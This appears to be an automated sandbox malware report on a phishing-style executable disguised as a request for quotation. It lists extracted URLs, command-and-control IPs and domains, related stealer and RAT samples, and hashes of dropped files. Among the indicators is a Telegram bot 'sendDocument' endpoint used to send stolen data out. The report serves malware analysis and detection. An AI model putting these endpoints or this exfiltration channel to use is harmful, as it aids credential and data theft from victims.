http://54.244.188.177/vayts	REQUEST FOR QUOTATION 1307-RFQ.exe, 00000000.00000002.1684737431.0000000000C38000.00000004.00000020.00020000.00000000.sdmp, REQUEST FOR QUOTATION 1307-RFQ.exe, 00000000.00000002.1685750618.0000000000D02000.00000004.00000020.00020000.00000000.sdmp, armsvc.exe, 00000001.00000003.1723140950.0000000000726000.00000004.00000020.00020000.00000000.sdmp	false
http://18.141.10.107/	armsvc.exe, 00000001.00000003.1723140950.0000000000726000.00000004.00000020.00020000.00000000.sdmp, armsvc.exe, 00000001.00000003.1744244802.0000000000726000.00000004.00000020.00020000.00000000.sdmp	false
http://82.112.184.197/v	armsvc.exe, 00000001.00000003.2101953987.0000000000726000.00000004.00000020.00020000.00000000.sdmp	false
http://82.112.184.197/G	armsvc.exe, 00000001.00000003.2334989969.0000000000726000.00000004.00000020.00020000.00000000.sdmp	false
http://ww99.przvgke.biz/asgidloooxieajf	armsvc.exe, 00000001.00000003.1839091419.000000000074B000.00000004.00000020.00020000.00000000.sdmp	false
https://github.com/pq-crystals/kyber/commit/28413dfbf523fdde181246451c2bd77199c0f7ffDilithium2Dilith	notification_click_helper.exe.1.dr	false
http://ww12.przvgke.biz/asgidloooxieajf?usid=25&utid=8251792691LocationETagAuthentication-InfoAgeAcc	armsvc.exe, 00000001.00000003.1839091419.000000000074B000.00000004.00000020.00020000.00000000.sdmp, armsvc.exe, 00000001.00000003.1839586338.0000000000757000.00000004.00000020.00020000.00000000.sdmp	false
http://172.234.222.138/asgidloooxieajfN	armsvc.exe, 00000001.00000003.1840081813.000000000071F000.00000004.00000020.00020000.00000000.sdmp	false
http://checkip.dyndns.org/q	REQUEST FOR QUOTATION 1307-RFQ.exe, 00000000.00000002.1686867266.0000000003EE0000.00000004.00001000.00020000.00000000.sdmp, RegSvcs.exe, 00000002.00000002.2917315050.0000000000402000.00000040.80000000.00040000.00000000.sdmp	false
https://api.telegram	RegSvcs.exe, 00000002.00000002.2961862883.0000000002B5A000.00000004.00000800.00020000.00000000.sdmp	true
http://172.234.222.138/	armsvc.exe, 00000001.00000003.1840081813.0000000000726000.00000004.00000020.00020000.00000000.sdmp	false
http://www.autoitscript.com/autoit3/8	Au3Info_x64.exe.1.dr	false
http://82.112.184.197/rdnh	armsvc.exe, 00000001.00000003.2101953987.0000000000735000.00000004.00000020.00020000.00000000.sdmp, armsvc.exe, 00000001.00000003.2101953987.000000000071F000.00000004.00000020.00020000.00000000.sdmp, armsvc.exe, 00000001.00000003.2102549025.0000000000737000.00000004.00000020.00020000.00000000.sdmp	false
http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name	RegSvcs.exe, 00000002.00000002.2961862883.0000000002A31000.00000004.00000800.00020000.00000000.sdmp	false
https://www.autoitscript.com/site/autoit/8	AutoIt3Help.exe.1.dr	false
http://54.244.188.177/	armsvc.exe, 00000001.00000003.1744244802.0000000000726000.00000004.00000020.00020000.00000000.sdmp, armsvc.exe, 00000001.00000003.1700090715.0000000000737000.00000004.00000020.00020000.00000000.sdmp	false
http://172.234.222.138/asgidloooxieajf:	armsvc.exe, 00000001.00000003.1840081813.0000000000726000.00000004.00000020.00020000.00000000.sdmp	false
https://reallyfreegeoip.org/xml/	REQUEST FOR QUOTATION 1307-RFQ.exe, 00000000.00000002.1686867266.0000000003EE0000.00000004.00001000.00020000.00000000.sdmp, RegSvcs.exe, 00000002.00000002.2917315050.0000000000402000.00000040.80000000.00040000.00000000.sdmp, RegSvcs.exe, 00000002.00000002.2961862883.0000000002A61000.00000004.00000800.00020000.00000000.sdmp	false
http://ww12.przvgke.biz/?ts=fENsZWFuUGVwcGVybWludEJsYWNrfHw1Y2U4NHxidWNrZXQwMTd8fHx8fHw2NzYwMjZjODc4	armsvc.exe, 00000001.00000003.1821807650.0000000002330000.00000004.00000020.00020000.00000000.sdmp	false
http://ww12.przvgke.biz/asgidloooxieajf?usid=25&utid=8251792691	armsvc.exe, 00000001.00000003.1839091419.0000000000762000.00000004.00000020.00020000.00000000.sdmp, armsvc.exe, 00000001.00000003.1839091419.000000000074B000.00000004.00000020.00020000.00000000.sdmp, armsvc.exe, 00000001.00000003.1839586338.0000000000757000.00000004.00000020.00020000.00000000.sdmp	false
http://44.221.84.105/un	armsvc.exe, 00000001.00000003.1764341618.0000000000720000.00000004.00000020.00020000.00000000.sdmp, armsvc.exe, 00000001.00000003.1764341618.0000000000726000.00000004.00000020.00020000.00000000.sdmp	false
http://172.234.222.138/asgidloooxieajf	armsvc.exe, 00000001.00000003.1840081813.0000000000726000.00000004.00000020.00020000.00000000.sdmp	false
http://checkip.dyndns.org	RegSvcs.exe, 00000002.00000002.2961862883.0000000002B5A000.00000004.00000800.00020000.00000000.sdmp	false
http://54.244.188.177/j	armsvc.exe, 00000001.00000003.1744244802.0000000000726000.00000004.00000020.00020000.00000000.sdmp	false
http://www.autoitscript.com/autoit3/	Au3Info_x64.exe.1.dr	false
http://ww99.przvgke.biz/asgidloooxieajf=	armsvc.exe, 00000001.00000003.2334989969.0000000000735000.00000004.00000020.00020000.00000000.sdmp, armsvc.exe, 00000001.00000003.2101953987.0000000000735000.00000004.00000020.00020000.00000000.sdmp, armsvc.exe, 00000001.00000003.2102549025.0000000000737000.00000004.00000020.00020000.00000000.sdmp, armsvc.exe, 00000001.00000003.1840324999.0000000000737000.00000004.00000020.00020000.00000000.sdmp, armsvc.exe, 00000001.00000003.1840081813.0000000000735000.00000004.00000020.00020000.00000000.sdmp	false
http://ww99.przvgke.biz/vuox	armsvc.exe, 00000001.00000003.1878960828.000000000074B000.00000004.00000020.00020000.00000000.sdmp, armsvc.exe, 00000001.00000003.2102437401.0000000000752000.00000004.00000020.00020000.00000000.sdmp, armsvc.exe, 00000001.00000003.2100645926.000000000074B000.00000004.00000020.00020000.00000000.sdmp, armsvc.exe, 00000001.00000003.1842899589.000000000074B000.00000004.00000020.00020000.00000000.sdmp, armsvc.exe, 00000001.00000003.1839091419.000000000074B000.00000004.00000020.00020000.00000000.sdmp	false
https://pcnatrk.net/track.	armsvc.exe, 00000001.00000003.1834764163.00000000024B0000.00000004.00000020.00020000.00000000.sdmp, armsvc.exe, 00000001.00000003.1821807650.0000000002330000.00000004.00000020.00020000.00000000.sdmp	false
http://ww99.przvgke.biz/asgidloooxieajfLocationETagAuthentication-InfoAgeAccept-RangesLast-ModifiedE	armsvc.exe, 00000001.00000003.1878960828.000000000074B000.00000004.00000020.00020000.00000000.sdmp, armsvc.exe, 00000001.00000003.2100645926.000000000074B000.00000004.00000020.00020000.00000000.sdmp, armsvc.exe, 00000001.00000003.1842899589.000000000074B000.00000004.00000020.00020000.00000000.sdmp, armsvc.exe, 00000001.00000003.2334610256.000000000074B000.00000004.00000020.00020000.00000000.sdmp, armsvc.exe, 00000001.00000003.1839091419.000000000074B000.00000004.00000020.00020000.00000000.sdmp	false
http://54.244.188.177/dy	armsvc.exe, 00000001.00000003.1744244802.0000000000735000.00000004.00000020.00020000.00000000.sdmp, armsvc.exe, 00000001.00000003.1744374270.0000000000737000.00000004.00000020.00020000.00000000.sdmp	false
http://54.244.188.177/q	armsvc.exe, 00000001.00000003.1744244802.0000000000726000.00000004.00000020.00020000.00000000.sdmp, armsvc.exe, 00000001.00000003.1764341618.0000000000726000.00000004.00000020.00020000.00000000.sdmp	false
http://ww99.przvgke.biz/asgidloooxieajf.	armsvc.exe, 00000001.00000003.2334989969.0000000000726000.00000004.00000020.00020000.00000000.sdmp, armsvc.exe, 00000001.00000003.2101953987.0000000000726000.00000004.00000020.00020000.00000000.sdmp, armsvc.exe, 00000001.00000003.1840081813.0000000000726000.00000004.00000020.00020000.00000000.sdmp	false
http://44.221.84.105/n	armsvc.exe, 00000001.00000003.1764341618.0000000000726000.00000004.00000020.00020000.00000000.sdmp	false
https://reallyfreegeoip.org	RegSvcs.exe, 00000002.00000002.2961862883.0000000002A61000.00000004.00000800.00020000.00000000.sdmp	false
http://www.winimage.com/zLibDll	armsvc.exe, 00000001.00000003.1962127671.0000000001F60000.00000004.00001000.00020000.00000000.sdmp	false
http://18.141.10.107/ndknji	armsvc.exe, 00000001.00000003.1723140950.0000000000726000.00000004.00000020.00020000.00000000.sdmp	false
http://api.telegram.org	RegSvcs.exe, 00000002.00000002.2961862883.0000000002B5A000.00000004.00000800.00020000.00000000.sdmp	false
http://ww99.przvgke.biz/ox	armsvc.exe, 00000001.00000003.2334989969.0000000000726000.00000004.00000020.00020000.00000000.sdmp, armsvc.exe, 00000001.00000003.2101953987.0000000000726000.00000004.00000020.00020000.00000000.sdmp, armsvc.exe, 00000001.00000003.1840081813.0000000000726000.00000004.00000020.00020000.00000000.sdmp	false
http://ww12.przvgke.biz/?ts=fENsZWFuUGVwcGVybWludEJsYWNrfHw1Y2U4NHxidWNrZXQwMTd8fHx8fHw2NzYwMjZjOWVh	armsvc.exe, 00000001.00000003.1834764163.00000000024B0000.00000004.00000020.00020000.00000000.sdmp	false
http://44.221.84.105/un3	armsvc.exe, 00000001.00000003.1764341618.0000000000726000.00000004.00000020.00020000.00000000.sdmp	false
https://api.telegram.org/bot-/sendDocument?chat_id=	REQUEST FOR QUOTATION 1307-RFQ.exe, 00000000.00000002.1686867266.0000000003EE0000.00000004.00001000.00020000.00000000.sdmp, RegSvcs.exe, 00000002.00000002.2917315050.0000000000402000.00000040.80000000.00040000.00000000.sdmp	false
https://github.com/pq-crystals/kyber/commit/28413dfbf523fdde181246451c2bd77199c0f7ff	notification_click_helper.exe.1.dr	false
http://ww12.przvgke.biz/vuox?usid=25&utid=8251791979	armsvc.exe, 00000001.00000003.1839091419.0000000000762000.00000004.00000020.00020000.00000000.sdmp	false
https://parking3.parklogic.com/page/enhance.js?pcId=12&domain=przvgke.biz	armsvc.exe, 00000001.00000003.1834764163.00000000024B0000.00000004.00000020.00020000.00000000.sdmp, armsvc.exe, 00000001.00000003.1834519561.0000000002060000.00000004.00001000.00020000.00000000.sdmp, armsvc.exe, 00000001.00000003.1821807650.0000000002330000.00000004.00000020.00020000.00000000.sdmp, armsvc.exe, 00000001.00000003.1821644148.0000000002060000.00000004.00001000.00020000.00000000.sdmp	false
http://82.112.184.197/	armsvc.exe, armsvc.exe, 00000001.00000003.2334989969.0000000000726000.00000004.00000020.00020000.00000000.sdmp, armsvc.exe, 00000001.00000003.2101953987.0000000000726000.00000004.00000020.00020000.00000000.sdmp	false

World Map of Contacted IPs

No. of IPs < 25%
25% < No. of IPs < 50%
50% < No. of IPs < 75%
75% < No. of IPs

Public IPs

IP	Domain	Country	ASN	ASN Name	Malicious
172.234.222.143	fwiwk.biz	United States	20940	AKAMAI-ASN1EU	false
72.52.179.174	ww99.przvgke.biz	United States	32244	LIQUIDWEBUS	false
158.101.44.242	checkip.dyndns.com	United States	31898	ORACLE-BMC-31898US	false
172.234.222.138	przvgke.biz	United States	20940	AKAMAI-ASN1EU	false
149.154.167.220	api.telegram.org	United Kingdom	62041	TELEGRAMRU	false
76.223.26.96	084725.parkingcrew.net	United States	16509	AMAZON-02US	false
44.221.84.105	saytjshyf.biz	United States	14618	AMAZON-AESUS	false
54.244.188.177	pywolwnvd.biz	United States	16509	AMAZON-02US	false
13.251.16.150	ifsaia.biz	United States	16509	AMAZON-02US	false
47.129.31.212	xlfhhhm.biz	Canada	34533	ESAMARA-ASRU	false
82.112.184.197	vjaxhpbji.biz	Russian Federation	43267	FIRST_LINE-SP_FOR_B2B_CUSTOMERSUPSTREAMSRU	false
18.141.10.107	ssbzmoy.biz	United States	16509	AMAZON-02US	false
172.67.177.134	reallyfreegeoip.org	United States	13335	CLOUDFLARENETUS	false

General Information

Joe Sandbox version:	41.0.0 Charoite
Analysis ID:	1576074
Start date and time:	2024-12-16 14:09:26 +01:00
Joe Sandbox product:	CloudBasic
Overall analysis duration:	0h 13m 59s
Hypervisor based Inspection enabled:	false
Report type:	full
Cookbook file name:	default.jbs
Analysis system description:	Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
Number of analysed new started processes analysed:	31
Number of new started drivers analysed:	0
Number of existing processes analysed:	0
Number of existing drivers analysed:	0
Number of injected processes analysed:	0
Technologies:	HCA enabled EGA enabled AMSI enabled
Analysis Mode:	default
Analysis stop reason:	Timeout
Sample name:	REQUEST FOR QUOTATION 1307-RFQ.exe
Detection:	MAL
Classification:	mal100.rans.spre.troj.spyw.expl.evad.winEXE@20/157@24/13
EGA Information:	Successful, ratio: 77.8%
HCA Information:	Failed
Cookbook Comments:	Found application associated with file extension: .exe

Warnings

Behavior information exceeds normal sizes, reducing to normal. Report will have missing behavior information.
Exclude process from analysis (whitelisted): MpCmdRun.exe, SearchFilterHost.exe, DiagnosticsHub.StandardCollector.Service.exe, SearchProtocolHost.exe, WMIADAP.exe, SIHClient.exe, conhost.exe, VSSVC.exe, WmiApSrv.exe, SearchIndexer.exe, svchost.exe
Excluded IPs from analysis (whitelisted): 4.175.87.197, 13.107.246.63, 20.109.210.53
Excluded domains from analysis (whitelisted): ocsp.digicert.com, slscr.update.microsoft.com, otelrules.azureedge.net, ctldl.windowsupdate.com, fe3cr.delivery.mp.microsoft.com
Execution Graph export aborted for target RegSvcs.exe, PID 7360 because it is empty
Execution Graph export aborted for target armsvc.exe, PID 7316 because there are no executed function
Not all processes where analyzed, report is missing behavior information
Report size exceeded maximum capacity and may have missing behavior information.
Report size exceeded maximum capacity and may have missing disassembly code.
Report size getting too big, too many NtAllocateVirtualMemory calls found.
Report size getting too big, too many NtOpenFile calls found.
Report size getting too big, too many NtOpenKeyEx calls found.
Report size getting too big, too many NtQueryValueKey calls found.
Report size getting too big, too many NtReadVirtualMemory calls found.
Report size getting too big, too many NtSetInformationFile calls found.
Report size getting too big, too many NtWriteFile calls found.
Some HTTP raw data packets have been limited to 10 per session. Please view the PCAPs for the complete data.
VT rate limit hit for: REQUEST FOR QUOTATION 1307-RFQ.exe

Simulations

Behavior and APIs

Time	Type	Description
08:10:19	API Interceptor	14x Sleep call for process: armsvc.exe modified
08:10:24	API Interceptor	260828x Sleep call for process: perfhost.exe modified
08:10:27	API Interceptor	598707x Sleep call for process: RegSvcs.exe modified
08:10:56	API Interceptor	199x Sleep call for process: msdtc.exe modified

Joe Sandbox View / Context

IPs

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
172.234.222.143	HSBC Payment Notification Scan Copy Ref 62587299-24_PDF.exe	Get hash	malicious	MassLogger RAT	Browse	fwiwk.biz/mepglnjkcg
	PURCHASE REQUIRED DETAILS 000487958790903403.exe	Get hash	malicious	DBatLoader, MassLogger RAT, PureLog Stealer	Browse	przvgke.biz/fauopp
	invoice_96.73.exe	Get hash	malicious	FormBook	Browse	fwiwk.biz/kbtuvb
	Order SMG 201906 20190816order.pdf.scr.exe	Get hash	malicious	AgentTesla, MassLogger RAT, PureLog Stealer	Browse	fwiwk.biz/lrhpwoxhabbo
	C6dAUcOA6M.exe	Get hash	malicious	AgentTesla, DBatLoader, PureLog Stealer	Browse	przvgke.biz/dadmwtnbmefxvi
	PO #09465610_GQ 003745_SO-242000846.exe	Get hash	malicious	MassLogger RAT, PureLog Stealer	Browse	fwiwk.biz/mhwavs
	IBKB.vbs	Get hash	malicious	AgentTesla, DBatLoader, PureLog Stealer	Browse	fwiwk.biz/jwvwqanfys
	Ziraat_Bankasi_Swift_Mesaji_BXB04958T.cmd	Get hash	malicious	AgentTesla, DBatLoader, PureLog Stealer	Browse	htwqzczce.biz/qccuqoixlchlyacl
	AENiBH7X1q.exe	Get hash	malicious	PureLog Stealer, RedLine	Browse	fwiwk.biz/t
	E_dekont.cmd	Get hash	malicious	DBatLoader, Nitol, PureLog Stealer, XWorm	Browse	fwiwk.biz/fvthsigvq
72.52.179.174	HSBC Payment Notification Scan Copy Ref 62587299-24_PDF.exe	Get hash	malicious	MassLogger RAT	Browse	ww99.przvgke.biz/aikqer
	HSBC Payment Notification Scan Copy Ref 62587299-24_PDF.exe	Get hash	malicious	MassLogger RAT	Browse	ww99.przvgke.biz/snsobwmcccpnrm
	HSBC Payment Notification Scan Copy Ref 62587299-24_PDF.exe	Get hash	malicious	MassLogger RAT	Browse	ww99.fwiwk.biz/mepglnjkcg
	PURCHASE REQUIRED DETAILS 000487958790903403.exe	Get hash	malicious	DBatLoader, MassLogger RAT, PureLog Stealer	Browse	ww99.przvgke.biz/fauopp
	Ziraat_Swift.hta	Get hash	malicious	MassLogger RAT, PureLog Stealer	Browse	ww99.fwiwk.biz/a
	8dPlV2lT8o.exe	Get hash	malicious	Simda Stealer	Browse	gatyhub.com/login.php
	7ObLFE2iMK.exe	Get hash	malicious	Simda Stealer	Browse	gatyhub.com/login.php
	UMwpXhA46R.exe	Get hash	malicious	Simda Stealer	Browse	gatyhub.com/login.php
	1fWgBXPgiT.exe	Get hash	malicious	Simda Stealer	Browse	gatyhub.com/login.php
	arxtPs1STE.exe	Get hash	malicious	Simda Stealer	Browse	gatyhub.com/login.php

Domains

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
przvgke.biz	RFQ_PO N89397-GM7287-Order.bat.exe	Get hash	malicious	MassLogger RAT, PureLog Stealer	Browse	172.234.222.138
	invoice_96.73.exe	Get hash	malicious	FormBook	Browse	172.234.222.143
	Order SMG 201906 20190816order.pdf.scr.exe	Get hash	malicious	AgentTesla, MassLogger RAT, PureLog Stealer	Browse	172.234.222.143
	C6dAUcOA6M.exe	Get hash	malicious	AgentTesla, DBatLoader, PureLog Stealer	Browse	172.234.222.143
	PO #09465610_GQ 003745_SO-242000846.exe	Get hash	malicious	MassLogger RAT, PureLog Stealer	Browse	172.234.222.143
ssbzmoy.biz	HSBC Payment Notification Scan Copy Ref 62587299-24_PDF.exe	Get hash	malicious	MassLogger RAT	Browse	18.141.10.107
	INV_NE_02_2034388.exe	Get hash	malicious	FormBook	Browse	18.141.10.107
	Shipment Notification.exe	Get hash	malicious	FormBook	Browse	18.141.10.107
	HSBC Payment Notification Scan Copy Ref 62587299-24_PDF.exe	Get hash	malicious	MassLogger RAT	Browse	18.141.10.107
	Request for Quotation.exe	Get hash	malicious	FormBook	Browse	18.141.10.107
	HSBC Payment Notification Scan Copy Ref 62587299-24_PDF.exe	Get hash	malicious	MassLogger RAT	Browse	18.141.10.107
	PURCHASE REQUIRED DETAILS 000487958790903403.exe	Get hash	malicious	DBatLoader, MassLogger RAT, PureLog Stealer	Browse	18.141.10.107
	RFQ _ Virtue 054451000085.exe	Get hash	malicious	FormBook	Browse	18.141.10.107
	Ziraat_Swift.hta	Get hash	malicious	MassLogger RAT, PureLog Stealer	Browse	18.141.10.107
	RFQ_PO N89397-GM7287-Order.bat.exe	Get hash	malicious	MassLogger RAT, PureLog Stealer	Browse	18.141.10.107
76899.bodis.com	HSBC Payment Notification Scan Copy Ref 62587299-24_PDF.exe	Get hash	malicious	MassLogger RAT	Browse	199.59.243.227
	PURCHASE REQUIRED DETAILS 000487958790903403.exe	Get hash	malicious	DBatLoader, MassLogger RAT, PureLog Stealer	Browse	199.59.243.227
	Ziraat_Swift.hta	Get hash	malicious	MassLogger RAT, PureLog Stealer	Browse	199.59.243.227
	http://readabilityscore.com	Get hash	malicious	Unknown	Browse	199.59.243.226
	http://bonalluterser.com/	Get hash	malicious	Unknown	Browse	199.59.243.226
	file.exe	Get hash	malicious	LummaC, Glupteba, SmokeLoader, Stealc, Xmrig	Browse	199.59.243.225
	S23UhdW5DH.exe	Get hash	malicious	LummaC, Glupteba, SmokeLoader, Socks5Systemz, Stealc	Browse	199.59.243.225
	xPUqa4qbDL.js	Get hash	malicious	Unknown	Browse	199.59.242.153
knjghuig.biz	HSBC Payment Notification Scan Copy Ref 62587299-24_PDF.exe	Get hash	malicious	MassLogger RAT	Browse	18.141.10.107
	HSBC Payment Notification Scan Copy Ref 62587299-24_PDF.exe	Get hash	malicious	MassLogger RAT	Browse	18.141.10.107
	HSBC Payment Notification Scan Copy Ref 62587299-24_PDF.exe	Get hash	malicious	MassLogger RAT	Browse	18.141.10.107
	PURCHASE REQUIRED DETAILS 000487958790903403.exe	Get hash	malicious	DBatLoader, MassLogger RAT, PureLog Stealer	Browse	18.141.10.107
	Ziraat_Swift.hta	Get hash	malicious	MassLogger RAT, PureLog Stealer	Browse	18.141.10.107
	invoice_96.73.exe	Get hash	malicious	FormBook	Browse	18.141.10.107
	Order SMG 201906 20190816order.pdf.scr.exe	Get hash	malicious	AgentTesla, MassLogger RAT, PureLog Stealer	Browse	18.141.10.107
	C6dAUcOA6M.exe	Get hash	malicious	AgentTesla, DBatLoader, PureLog Stealer	Browse	18.141.10.107
	PO #09465610_GQ 003745_SO-242000846.exe	Get hash	malicious	MassLogger RAT, PureLog Stealer	Browse	18.141.10.107

ASNs

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
LIQUIDWEBUS	rebirth.spc.elf	Get hash	malicious	Mirai, Okiru	Browse	69.167.175.77
	HSBC Payment Notification Scan Copy Ref 62587299-24_PDF.exe	Get hash	malicious	MassLogger RAT	Browse	72.52.179.174
	HSBC Payment Notification Scan Copy Ref 62587299-24_PDF.exe	Get hash	malicious	MassLogger RAT	Browse	72.52.179.174
	HSBC Payment Notification Scan Copy Ref 62587299-24_PDF.exe	Get hash	malicious	MassLogger RAT	Browse	72.52.179.174
	PURCHASE REQUIRED DETAILS 000487958790903403.exe	Get hash	malicious	DBatLoader, MassLogger RAT, PureLog Stealer	Browse	72.52.179.174
	akcqrfutuo.elf	Get hash	malicious	Unknown	Browse	67.225.207.146
	xobftuootu.elf	Get hash	malicious	Unknown	Browse	67.225.254.236
	http://editableslides.co	Get hash	malicious	HTMLPhisher, TechSupportScam	Browse	67.227.216.154
	https://bielefelde.de/	Get hash	malicious	Unknown	Browse	72.52.179.174
	Ziraat_Swift.hta	Get hash	malicious	MassLogger RAT, PureLog Stealer	Browse	72.52.179.174
AKAMAI-ASN1EU	https://login.corp-internal.org/17058d3d8656ed69?l=27	Get hash	malicious	Unknown	Browse	2.16.158.75
	T0x859fNfn.exe	Get hash	malicious	Vidar	Browse	23.209.72.33
	https://cavotec-au.sharefile.com/public/share/web-1271a93971714a91	Get hash	malicious	HTMLPhisher	Browse	104.126.36.32
	file.exe	Get hash	malicious	LummaC, Amadey, Cryptbot, LummaC Stealer, Stealc, Xmrig	Browse	23.55.153.106
	mips.elf	Get hash	malicious	Unknown	Browse	204.237.205.123
	bot.sh4.elf	Get hash	malicious	Mirai	Browse	95.100.100.165
	bot.x86.elf	Get hash	malicious	Mirai	Browse	95.100.100.171
	bot.mpsl.elf	Get hash	malicious	Mirai	Browse	95.100.100.142
	armv5l.elf	Get hash	malicious	Unknown	Browse	2.21.22.15
	file.exe	Get hash	malicious	LummaC, Amadey, LummaC Stealer, Stealc	Browse	23.55.153.106
ORACLE-BMC-31898US	ref_97024130865.exe	Get hash	malicious	MassLogger RAT, PureLog Stealer	Browse	193.122.130.0
	TEKL#U0130F #U0130STE#U011e#U0130 - TUSA#U015e T#U00dcRK HAVACILIK UZAY SANAY#U0130#U0130_xlsx.exe	Get hash	malicious	Snake Keylogger, VIP Keylogger	Browse	193.122.130.0
	PURCHASE ORDER 006-2024 GIA-AV Rev 1_pdf.exe	Get hash	malicious	GuLoader	Browse	158.101.44.242
	SWIFT091816-24_pdf.exe	Get hash	malicious	GuLoader, MassLogger RAT	Browse	193.122.6.168
	REQUEST FOR QUOATION AND PRICES 0910775_pdf.exe	Get hash	malicious	GuLoader, MassLogger RAT	Browse	158.101.44.242
	arm5.elf	Get hash	malicious	Unknown	Browse	147.154.242.4
	SWIFT09181-24_pdf.exe	Get hash	malicious	GuLoader, MassLogger RAT	Browse	193.122.130.0
	file.exe	Get hash	malicious	Amadey, AsyncRAT, HVNC, LummaC Stealer, RedLine, Stealc	Browse	193.122.130.0
	Shipment 990847575203.pdf.exe	Get hash	malicious	Snake Keylogger, VIP Keylogger	Browse	158.101.44.242
	elitebotnet.x86.elf	Get hash	malicious	Mirai, Okiru	Browse	140.204.52.53

Process:	C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe
File Type:	PE32 executable (console) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	1459712
Entropy (8bit):	5.005742623139484
Encrypted:	false
SSDEEP:	24576:THCAR0iKGJ0eeQ2yPyzc+E7xonyVGc/dT5N:DCAxJLeQVPyzc+E7xQ2l
MD5:	28FBED9EEB33960368194E3DF7F50644
SHA1:	96466EA2815E79EB9E2CED2EA6295EDA1E342903
SHA-256:	8ED753ED672858881E18E5E6CF918A2A3A4762E48AE7CDB07645BA923F7E1513
SHA-512:	DDD37FC82316DA27F89CA66DA3770EA9D3EA93887E0D4784C95E5FCA0B5F5903883ABBE6C393D0B5749224CFC5B9EC1D3B525CE060A3DBF5F2BE3292C391E6EA
Malicious:	true
Antivirus:	Antivirus: Avira, Detection: 100% Antivirus: Joe Sandbox ML, Detection: 100%
Reputation:	unknown
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........S.~.2.-.2.-.2.-n.G-.2.-n.E-J2.-n.D-.2.-.Z.,.2.-.Z.,.2.-.Z.,.2.-.J%-.2.-.2.-.2.-.[.,.2.-.[I-.2.-.2!-.2.-.[.,.2.-Rich.2.-........................PE..L...g.(c.....................6......&........0....@..........................P-.............................................,b..<....p...............................L..8............................L..@............0..,............................text............................... ..`.rdata...8...0...:..."..............@..@.data........p.......\..............@....rsrc........p.......f..............@...................................................................................................................................................................................................................................................................................................................................

C:\Program Files (x86)\AutoIt3\Au3Info.exe

Process:	C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe
File Type:	PE32 executable (GUI) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	1401344
Entropy (8bit):	4.952367921671459
Encrypted:	false
SSDEEP:	24576:pC/KgVGJ0eeQ2yPyzc+E7xonyVGc/dT5N:hJLeQVPyzc+E7xQ2l
MD5:	A4BEEF42793DEC8F04642E1950AF1A82
SHA1:	67B77679E0FC1A801B48C5B41F8C625DF943D092
SHA-256:	958B8FC734C2BECB8BA13317A945278B71A827950731234FA6751F81377AC621
SHA-512:	8BE3F7DED9BB4CE813A523AE4A4B344B812FFF725EA2A78B86CDA762C3094A5C58AAE6A5A29A5305BE33945FA6087C9C22903C9154D59C027F4179F5ED559A07
Malicious:	true
Antivirus:	Antivirus: Avira, Detection: 100% Antivirus: Joe Sandbox ML, Detection: 100%
Reputation:	unknown
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.........jZ..9Z..9Z..9...9Q..9...9%..9...9B..9...8r..9...8K..9...8H..9S.x9W..9Z..9..9...8]..9...9[..9Z.\|9[..9...8[..9RichZ..9........PE..L...C.(c.........."......:...........\.......P....@..........................P,.....W`......................................$...........0..............................8...............................@............P...............................text...19.......:.................. ..`.rdata...\|...P...~...>..............@..@.data...............................@....rsrc...0...........................@..@.reloc.......`.......r..............@...........................................................................................................................................................................................................................................................................................................

C:\Program Files (x86)\AutoIt3\Au3Info_x64.exe

Process:	C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe
File Type:	PE32+ executable (GUI) x86-64, for MS Windows
Category:	dropped
Size (bytes):	1420800
Entropy (8bit):	4.950215047864385
Encrypted:	false
SSDEEP:	24576:vKdHuGJ0eeQ2yPyzc+E7xonyVGc/dT5N:ydhJLeQVPyzc+E7xQ2l
MD5:	1695882E0D4F983EE8B6BF1BEA8B9E9F
SHA1:	8FFBFC633126AF4A6E1F3402D653DC990518CC20
SHA-256:	1B8ABC08759A7E527C29ECC92D4B4CCF98003DEA1D76E152033D2E7FB1152ABE
SHA-512:	A68474E910E23858E16B327BE667E00E79D1C550217746C61236D53A93ECE7BC43FDF9E8FA8AA8F602DAF6E046256B3C4C70B8A896CE8CEEEA09FC3976020334
Malicious:	true
Antivirus:	Antivirus: Avira, Detection: 100% Antivirus: Joe Sandbox ML, Detection: 100%
Reputation:	unknown
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........9..X...X...X..-....X..-....X..-....X...0...X...0...X...0...X... n..X...X..YX..<1.X..<1...X...Xj..X..<1...X..Rich.X..........................PE..d...G.(c.........."......J...^......Tr.........@..............................,.....'].... .................................................,........ ..0...............................8............................................`..`............................text....H.......J.................. ..`.rdata.......`.......N..............@..@.data........ ......................@....pdata..............................@..@.rsrc...0.... ......."..............@..@.reloc..............................@...................................................................................................................................................................................................................................

C:\Program Files (x86)\AutoIt3\Aut2Exe\Aut2exe.exe

Process:	C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe
File Type:	PE32 executable (GUI) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	2203136
Entropy (8bit):	7.642446908339956
Encrypted:	false
SSDEEP:	49152:TK0eqkSR7Xgo4TiRPnLWvJpJLeQVPyzc+E7xQ2l:TK0pR7Xn4TiRCvJp1vcbE7xQ2l
MD5:	2E6D5F994313D2E083B432F252C27B3D
SHA1:	8715E6F0C747E1925E84634F331823D59315CC56
SHA-256:	6C1A2969DC330DD69D4F5C3AE155E57E1B961296EAE946C845CB257564CCADAB
SHA-512:	99AA5C203304A13C23CBD636AE51AB7B703AE92BE1DEE528B22CA68DAA475A4568D274A1C44875379CF019E7B6A72AC4B315AAA490FDEBDE56D1C5E9ABB34C07
Malicious:	true
Antivirus:	Antivirus: Avira, Detection: 100% Antivirus: Joe Sandbox ML, Detection: 100%
Reputation:	unknown
